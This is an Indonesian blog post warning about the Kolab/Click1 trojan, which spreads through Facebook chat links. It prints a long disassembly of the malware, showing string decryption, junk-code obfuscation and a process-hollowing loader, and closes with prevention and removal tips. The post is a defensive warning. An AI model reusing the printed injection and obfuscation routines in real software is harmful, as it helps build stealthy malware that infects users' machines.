Selasa, 04 Oktober 2011

VIRUS TROJAN MENYEBAR VIA CHAT FB

pernahkah kamu mendapat chat seperti diatas? atau yang seperti dibawah ini?
berhati hatilah karena chat tersebut sebenarnya sedang mengirimkan link untuk mendownload virus. kamu jangan tergoda dengan file .JPG karena sebenarnya bukan foto sama sekali melainkan file virus dengan aplikasi ms.dos.
virus tersebut dibuat dengan menggunakan bahasa assembly. berikut adalah hasil decompile dari si virus tersebut:
n004010EF()
   push   ebp
   mov   ebp,esp
   sub   esp,10
   push   ebx
   push   esi
   xor   ecx,ecx
   xor   esi,esi
   push   edi
   mov   dword ptr [ebp-0C],ecx
   xor   ebx,ebx

l00401101:
   mov   eax,ecx
   cdq
   push   0F
   pop   edi
   idiv   edi
   mov   byte ptr [ecx+00417DB0],cl
   inc   ecx
   cmp   ecx,00000100
   mov   al,[edx+00416FC4]
   mov   byte ptr [ecx+004182BF],al
   jl   00401101

l00401124:
   xor   eax,eax
   mov   edi,000000FF

l0040112B:
   movzx   edx,byte ptr [eax+00417DB0]
   movzx   ecx,byte ptr [eax+004182C0]
   add   edx,ebx
   add   ecx,edx
   and   ecx,edi
   mov   ebx,ecx
   lea   ecx,[ebx+00417DB0]
   mov   dl,[ecx]
   xor   byte ptr [eax+00417DB0],dl
   mov   dl,[eax+00417DB0]
   xor   byte ptr [ecx],dl
   mov   cl,[ecx]
   xor   byte ptr [eax+00417DB0],cl
   inc   eax
   cmp   eax,00000100
   jl   0040112B

l00401167:
   mov   ebx,[ebp+08]
   push   ebx
   call   dword ptr [0041300C]
   xor   eax,eax
   cmp   byte ptr [ebx],al
   mov   dword ptr [ebp-04],eax
   jz   00401185

l0040117A:
   inc   dword ptr [ebp-04]
   mov   ecx,[ebp-04]
   cmp   byte ptr [ecx+ebx],al
   jnz   0040117A

l00401185:
   cmp   dword ptr [ebp-04],eax
   mov   dword ptr [ebp-08],eax
   jle   004012EF

l00401191:
   inc   bx
   mov   eax,eax
   or   bx,ax
   dec   bl
   ror   cl,1C
   dec   eax
   sub   cx,ax
   sub   eax,00
   inc   eax
   xor   eax,ebx
   not   bl
   neg   bx
   inc   ebx
   mov   bx,bx
   xor   cl,al
   sub   eax,ecx
   xor   bl,F6
   nop
   inc   esi
   and   esi,edi
   movzx   eax,byte ptr [esi+00417DB0]
   add   eax,[ebp-0C]
   and   eax,edi
   mov   dword ptr [ebp-0C],eax
   lea   eax,[eax+00417DB0]
   mov   cl,[eax]
   xor   byte ptr [esi+00417DB0],cl
   mov   cl,[esi+00417DB0]
   xor   byte ptr [eax],cl
   mov   cl,[eax]
   xor   byte ptr [esi+00417DB0],cl
   movzx   eax,byte ptr [eax]
   movzx   ecx,byte ptr [esi+00417DB0]
   add   eax,ecx
   mov   ecx,[ebp+08]
   and   eax,edi
   mov   dl,[eax+00417DB0]
   mov   eax,[ebp-08]
   add   eax,ecx
   cmp   dl,[eax]
   mov   byte ptr [00417A71],dl
   mov   dword ptr [ebp-10],eax
   jnz   00401219

l00401211:
   xor   dl,dl
   mov   byte ptr [00417A71],dl

l00401219:
   ror   bx,19
   not   eax
   sub   al,00
   or   bx,ax
   not   ecx
   and   al,bl
   sub   bx,1B
   ror   cx,1B
   add   ax,cx
   ror   ecx,10
   and   cx,FF
   add   eax,000000B2
   neg   ecx
   xor   al,cl
   or   bl,1D
   shl   bl,12
   sar   bl,14
   and   ax,FFFF
   and   eax,ecx
   not   eax
   dec   ebx
   or   eax,ecx
   not   cl
   ror   bx,02
   shl   ebx,03
   or   eax,00
   shl   bl,1B
   ror   bl,0D
   sub   al,00
   xor   cx,ax
   ror   ecx,1C
   or   eax,00
   add   al,00
   not   ecx
   inc   cl
   not   bx
   inc   bx
   sar   bl,17
   ror   cl,04
   nop
   ror   cx,05
   and   ecx,09
   ror   ebx,15
   xor   bl,cl
   inc   ecx
   sub   eax,00
   shl   cx,06
   and   bl,al
   inc   bx
   or   bx,00
   inc   eax
   ror   bl,10
   shl   bx,1B
   and   cx,0D
   shl   bx,04
   shl   cl,1A
   and   ecx,eax
   neg   bl
   nop
   inc   ebx
   and   bl,FF
   sar   cx,13
   ror   bl,09
   sub   eax,ebx
   ror   ebx,19
   add   eax,3F
   not   bx
   shl   ax,13
   dec   bx
   add   al,cl
   mov   eax,[ebp-10]
   xor   byte ptr [eax],dl
   inc   dword ptr [ebp-08]
   mov   eax,[ebp-08]
   cmp   eax,[ebp-04]
   jl   00401191

l004012EC:
   mov   ebx,[ebp+08]

l004012EF:
   pop   edi
   pop   esi
   mov   eax,ebx
   pop   ebx
   leave
   ret

fn004012F6()
   mov   eax,[004183CC]
   push   00416D64
   push   eax
   call   dword ptr [00413014]
   push   40
   push   00003000
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   call   eax
   ret

fn0040131D()
   push   00416D40
   push   dword ptr [esp+10]
   call   dword ptr [00413014]
   push   dword ptr [esp+08]
   push   dword ptr [esp+08]
   call   eax
   ret

fn00401337()
   mov   eax,[004183CC]
   push   00416FD4
   push   eax
   call   dword ptr [00413014]
   push   dword ptr [esp+0C]
   xor   ecx,ecx
   push   dword ptr [esp+0C]
   mov   dword ptr [004183D0],eax
   push   ecx
   push   ecx
   push   04
   push   ecx
   push   ecx
   push   ecx
   push   dword ptr [esp+24]
   push   ecx
   call   eax
   ret

fn00401366()
   mov   eax,[004183CC]
   push   00416D88
   push   eax
   call   dword ptr [00413014]
   push   00
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   call   eax
   ret

fn0040138C()
   mov   eax,[004183CC]
   push   00416DAC
   push   eax
   call   dword ptr [00413014]
   push   dword ptr [esp+08]
   push   dword ptr [esp+08]
   call   eax
   ret

fn004013A8()
   mov   eax,[004183CC]
   push   00416DD0
   push   eax
   call   dword ptr [00413014]
   push   dword ptr [esp+08]
   push   dword ptr [esp+08]
   call   eax
   ret

fn004013C4()
   mov   edx,[004183CC]
   push   ebx
   dec   cl
   inc   bx
   or   bx,16
   shl   cx,15
   neg   ecx
   or   ax,bx
   sub   bl,DE
   not   ecx
   ror   cl,16
   shl   ax,1A
   shl   cx,0B
   or   eax,04
   inc   ebx
   or   eax,ebx
   and   eax,FF
   inc   cx
   sar   al,07
   sub   bl,cl
   ror   al,18
   and   bx,14
   sub   eax,00
   shl   bx,0B
   and   bl,06
   add   ebx,ecx
   and   bx,FF
   or   al,cl
   push   00416F38
   push   edx
   call   dword ptr [00413014]
   mov   edx,eax
   not   ebx
   neg   eax
   add   bx,00
   not   bx
   ror   cl,09
   sar   al,1B
   shl   cl,14
   ror   bx,0E
   inc   ecx
   ror   ax,12
   shl   bl,18
   sub   eax,07
   and   ecx,ebx
   nop
   shl   al,16
   ror   eax,12
   sub   cl,02
   ror   bl,05
   ror   eax,02
   or   bx,02
   sub   bx,00
   sar   ebx,07
   neg   eax
   xor   eax,66
   ror   cl,1C
   neg   eax
   inc   cl
   dec   ecx
   inc   eax
   and   bl,cl
   ror   eax,0F
   mov   bl,bl
   nop
   shl   eax,16
   neg   cl
   inc   bl
   not   eax
   add   ebx,3F
   ror   ecx,08
   sub   al,00
   nop
   shl   ecx,09
   sar   bx,1A
   ror   bl,0F
   and   ecx,06
   not   cl
   ror   eax,08
   not   bl
   shl   eax,04
   ror   al,0E
   sub   bl,E7
   add   cx,62
   or   ecx,ebx
   ror   eax,02
   and   ebx,18
   xor   ecx,000000E0
   or   ax,bx
   shl   bl,10
   xor   eax,0000009A
   sar   ecx,13
   neg   ebx
   ror   bx,18
   neg   al
   ror   ebx,1C
   neg   ax
   push   dword ptr [esp+08]
   call   edx
   pop   ebx
   ret

fn004014DE()
   push   ecx
   push   ebx
   push   ebp
   push   esi
   push   edi
   mov   edi,eax
   not   bx
   ror   cl,09
   sar   al,1B
   shl   cl,14
   ror   bx,0E
   inc   ecx
   ror   ax,12
   shl   bl,18
   push   00416FD4
   call   004010EF
   pop   ecx
   add   bl,al
   neg   eax
   xor   cl,al
   sub   bx,00
   shl   al,14
   not   cx
   mov   eax,eax
   or   ecx,ebx
   ror   bl,1E
   sub   al,cl
   xor   ecx,ebx
   sar   al,0F
   sub   bx,0E
   or   bx,01
   neg   ax
   not   ebx
   neg   eax
   add   bx,00
   push   00416D40
   call   004010EF
   pop   ecx
   ror   bl,0B
   and   eax,11
   push   00416D64
   call   004010EF
   pop   ecx
   inc   ebx
   dec   bl
   nop
   not   ebx
   dec   eax
   neg   eax
   add   eax,00
   and   eax,FF
   and   bx,14
   add   eax,ecx
   sub   ebx,00
   or   eax,00
   neg   cx
   or   ax,001A
   mov   bl,bl
   xor   eax,0000009E
   inc   cl
   push   00416D88
   call   004010EF
   pop   ecx
   and   cl,bl
   add   bl,91
   shl   ebx,14
   sub   ecx,00
   xor   ebx,ecx
   ror   al,01
   neg   bl
   shl   ax,1B
   ror   bx,02
   dec   bl
   ror   bl,17
   or   eax,14
   sub   al,00
   ror   ebx,09
   neg   eax
   not   bl
   xor   al,cl
   shl   eax,0E
   push   00416DAC
   call   004010EF
   pop   ecx
   not   cx
   sar   bl,01
   dec   cl
   dec   al
   ror   ecx,0F
   or   bl,cl
   add   cl,00
   ror   ecx,07
   inc   ebx
   not   eax
   sub   cx,bx
   dec   eax
   sub   eax,00
   neg   eax
   sub   cl,00
   or   bl,00
   shl   ebx,13
   sub   ax,bx
   not   ebx
   inc   bx
   and   al,bl
   mov   bx,bx
   neg   ecx
   sub   bx,cx
   push   00416DD0
   call   004010EF
   mov   dword ptr [esp],00416DF4
   call   004010EF
   mov   ebp,00416F5C
   push   ebp
   call   004010EF
   mov   esi,[00413018]
   pop   ecx
   pop   ecx
   push   00416CB0
   call   esi
   push   00416D1C
   mov   dword ptr [004183CC],eax
   call   esi
   mov   dword ptr [esp+10],eax
   and   ax,0001
   sar   bx,14
   shl   al,09
   ror   ecx,0B
   or   bl,00
   dec   bx
   add   ebx,ecx
   neg   eax
   ror   bl,17
   not   al
   or   cx,00
   dec   ax
   ror   bl,0E
   inc   al
   push   ebp
   push   dword ptr [004183CC]
   call   dword ptr [00413014]
   mov   dword ptr [00417D68],00000044
   mov   dword ptr [00417A90],00010007
   cmp   word ptr [edi],5A4D
   mov   dword ptr [004183C8],edi
   jnz   00401773

l00401698:
   mov   esi,[edi+3C]
   add   esi,edi
   cmp   dword ptr [esi],00004550
   jnz   00401773

l004016A9:
   push   00417EB0
   push   00417D68
   call   eax
   push   eax
   call   00401337
   push   dword ptr [esp+1C]
   push   dword ptr [esi+34]
   push   dword ptr [00417EB0]
   call   0040131D
   push   dword ptr [esi+50]
   push   dword ptr [esi+34]
   push   dword ptr [00417EB0]
   call   004012F6
   push   dword ptr [esi+54]
   push   edi
   push   dword ptr [esi+34]
   push   dword ptr [00417EB0]
   call   00401366
   xor   ebp,ebp
   add   esp,34
   xor   ebx,ebx
   cmp   word ptr [esi+06],bp
   jbe   0040173D

l004016FD:
   mov   eax,[004183C8]
   mov   eax,[eax+3C]
   add   eax,ebp
   lea   eax,[eax+edi+000000F8]
   push   dword ptr [eax+10]
   mov   ecx,[eax+14]
   mov   dword ptr [00417A7C],eax
   mov   eax,[eax+0C]
   add   eax,[esi+34]
   add   ecx,edi
   push   ecx
   push   eax
   push   dword ptr [00417EB0]
   call   00401366
   movzx   eax,word ptr [esi+06]
   add   esp,10
   inc   ebx
   add   ebp,28
   cmp   ebx,eax
   jl   004016FD

l0040173D:
   mov   edi,00417A90
   push   edi
   push   dword ptr [00417EB4]
   call   0040138C
   mov   eax,[esi+28]
   add   eax,[esi+34]
   push   edi
   push   dword ptr [00417EB4]
   mov   dword ptr [00417B40],eax
   call   004013A8
   push   dword ptr [00417EB4]
   call   004013C4
   add   esp,14

l00401773:
   pop   edi
   pop   esi
   pop   ebp
   pop   ebx
   pop   ecx
   ret

fn00401779()
   push   ebx
   push   ebp
   push   esi
   push   edi
   ror   cx,07
   shl   al,03
   push   00416CB0
   call   dword ptr [00413018]
   mov   edi,eax
   and   bl,FF
   mov   esi,[00413014]
   push   00416E3C
   push   edi
   call   esi
   mov   dword ptr [004183D4],eax
   shl   bl,15
   push   00416E60
   push   edi
   call   esi
   mov   dword ptr [004184DC],eax
   ror   bx,06
   push   00416E84
   push   edi
   call   esi
   mov   dword ptr [004184E0],eax
   mov   eax,eax
   push   00416EA8
   push   edi
   call   esi
   mov   dword ptr [004184E4],eax
   neg   ecx
   mov   eax,[004183D4]
   xor   ebp,ebp
   cmp   eax,ebp
   jz   0040184F

l004017E4:
   cmp   dword ptr [004184DC],ebp
   jz   0040184F

l004017EC:
   cmp   dword ptr [004184E0],ebp
   jz   0040184F

l004017F4:
   and   bl,al
   movzx   ecx,word ptr [esp+14]
   push   00000118
   push   ecx
   push   ebp
   call   eax
   mov   esi,eax
   add   cx,64
   cmp   esi,ebp
   jnz   00401813

l0040180E:
   shl   bl,02
   jmp   00401852

l00401813:
   add   bx,cx
   push   esi
   push   ebp
   call   dword ptr [004184E0]
   mov   edi,eax
   and   bl,07
   cmp   edi,ebp
   jnz   0040182B

l00401827:
   xor   ecx,ebx
   jmp   00401852

l0040182B:
   and   cx,ax
   push   esi
   push   ebp
   call   dword ptr [004184DC]
   mov   dword ptr [004184F8],eax
   inc   bl
   push   edi
   call   dword ptr [004184E4]
   mov   dword ptr [004184FC],eax
   and   ecx,eax
   mov   al,01
   jmp   00401854

l0040184F:
   ror   al,1D

l00401852:
   xor   al,al

l00401854:
   pop   edi
   pop   esi
   pop   ebp
   pop   ebx
   ret

fn00401859()
   push   ebx
   mov   ebx,[004184E8]
   push   ebp
   mov   ebp,[004184EC]
   push   esi
   push   edi
   push   00416CB0
   call   dword ptr [00413018]
   mov   esi,[00413014]
   mov   edi,eax
   push   00416ECC
   push   edi
   call   esi
   push   00416EF0
   push   edi
   mov   dword ptr [00417A88],eax
   call   esi
   push   00416F14
   push   edi
   mov   dword ptr [004183C0],eax
   call   esi
   test   ebx,ebx
   mov   dword ptr [00417DAC],eax
   push   ebp
   jz   004018B6
---------------------------------------------------------------


Hebatnya, akun Facebook yang di infeksi oleh virus tidak mengalami perubahan sama sekali. Bahkan tidak ada pop up FB Chat yang terbuka. Yang dibutuhkan oleh virus ini hanyalah akun Facebook tersebut sedang login saja. Kemungkinan besar hal ini terjadi supaya korban virus tidak menyadari kalau komputernya telah terinfeksi oleh Kolab/Click1 dan menyebarkan banyak sekali FB Chat ke kontak-kontak Facebooknya yang mengarahkan untuk mendownload virus ini.

Jika Anda meng-klik link pada pesan chat tersebut, maka secara otomatis file akan terdownload ke dalam komputer Anda. Dan jika Anda menjalankan file tersebut, maka komputer Anda sudah pasti telah terinfeksi.

Sulit dibasmi dan menyebabkan BSOD (Bumi Serpong Ooo Damai ??.. :p)
Kolab/Click1 tidak berjalan pada proses atau services Windows, sehingga sulit menemukan dan mematikan keberadaan worm/rootkit ini. Tetapi, worm ini justru mendompleng atau menumpang pada file svchost.exe milik Windows, sehingga Anda akan sulit mematikan-nya. Jika Anda memaksa mematikan file svchost.exe, komputer akan mengalami blue screen of death / BSOD. Termasuk jika Anda mencoba melakukan scan menggunakan tools tertentu seperti GMER, tools yang biasa digunakan untuk mendeteksi rootkit. (lihat gambar 6)
Gambar 6, Berusaha mematikan file svchost yang telah didompleng, akan muncul BSOD

Broadcast ke IP-IP tertentu
Walaupun tidak berjalan pada proses atau services Windows, Kolab/Click1 memanfaatkan file svchost.exe Windows, untuk melakukan broadcast pada IP-IP tertentu. (lihat gambar 7)
Gambar 7, Aktivitas broadcast yang dilakukan oleh Kolab/Click1

Mencantumkan diri-nya pada Windows Firewall
Agar dapat berjalan bebas tanpa hambatan, Kolab/Click1 mendaftarkan programnya pada Windows Firewall, sehingga diperbolehkan untuk melakukan koneksi dan broadcast. (lihat gambar 8)
Gambar 8, Aktivitas broadcast yang dilakukan oleh Kolab/Click1



Tips Hindari Kolab/Click1
Berikut beberapa tips bagi Anda jika tidak ingin terinfeksi dan menjadi korban dari worm/rootkit ini
  1. Hindari melakukan klik pada link yang dikirim pada Anda, baik melalui pesan chat FB atau status.
  2. Beritahukan pada teman Anda, bahwa komputer tersebut telah terinfeksi virus, dan segera lakukan update dan scan komputer dengan antivirus yang terupdate.
  3. Jangan melakukan copy link atau melakukan pemberitahuan disertai link tersebut, karena dengan begitu Anda justru ikut menyebarkan link yang mengandung virus tersebut.
  4. Jangan meninggalkan FB Anda dalam keadaan aktif/login, sebaiknya Anda logout dahulu hingga Anda kembali.
  5. Gunakan Secure HTTP / HTTPS pada saat Login FB, hal ini agar FB Anda tidak mudah diakses oleh orang lain disekitar Anda.

    Apa yang harus dilakukan jika sudah terlajur terinfeksi?
    Apabila kita sudah terlanjur menjalankan file virusnya, sudah pasti komputer yang kita gunakan akan terinfeksi virus tersebut. Beberapa hal yang bisa kita lakukan sebagai langkah awal pertolongan pertama mungkin bisa melakukan beberapa langkah berikut:
    1. Tutup akun facebook ( dalam hal ini Logout dari akun facebook) untuk mencegah penyebaran lebih banyak ke teman-teman facebook kita.
    2. Pastikan di Komputer anda terinstall program Antivirus (disarankan ativirus luar), dan lakukan update database ke versi paling terbaru.
    3. Matikan koneksi internet, kemudian lakukan full sistem scan di komputer menggunakan Antivirus yang sudah terupdate tadi, jika ada beberapa file yang terdeteksi (biasanya W32/Kolab.xxx atau Trojan.Click1.xxxx) kita bisa menghapusnya atau untuk keamanan kita bisa meng-karantina (quarentine) file yang dicurigai sebagai virus.
    4. Restart komputer. Untuk memastikan keadaan sistem komputer kita, bisa lakukan lagi full sistem scan setelah komputer di restart.
    Ini tidak menjamin komputer akan bebas 100% dari infeksi virus tersebut, semua tergantung kemampuan dari masing-masing antivirus yang digunakan. Dari beberapa sumber mengatakan, w32/kolab yang menyebar melaui chat facebook ini merupakan varian terbaru dari worm kolab (worm jaringan) yang sudah lama menyebar. Jadi untuk saat ini masih sulit dibersihkan.
    Berikut ini saya sertakan hasil deteksi beberapa antivirus terhadap virus tersebut.




Tidak ada komentar:

Posting Komentar

SILAHKAN KOMENTARI POSTINGAN INI